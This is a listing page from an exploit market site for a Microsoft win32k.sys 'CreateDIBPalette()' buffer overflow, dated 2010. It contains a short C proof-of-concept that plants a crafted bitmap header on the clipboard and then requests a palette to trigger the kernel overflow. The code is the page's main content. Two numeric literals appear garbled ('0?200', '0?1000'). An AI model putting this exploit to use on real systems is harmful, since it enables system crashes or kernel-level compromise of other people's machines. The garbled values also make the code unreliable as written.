[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft win32k.sys Driver "CreateDIBPalette()" Buffer Overflow

Author
Arkon
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13599
Category
local exploits
Date add
06-08-2010
Platform
windows
================================================================
Microsoft win32k.sys Driver "CreateDIBPalette()" Buffer Overflow
================================================================


Sources:
http://www.ragestorm.net/blogs/?p=255
http://secunia.com/advisories/40870/
 
 
DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);
 
BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0?200;
 
HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0?1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);
 
OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();
 
OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);



#  0day.today [2024-12-24]  #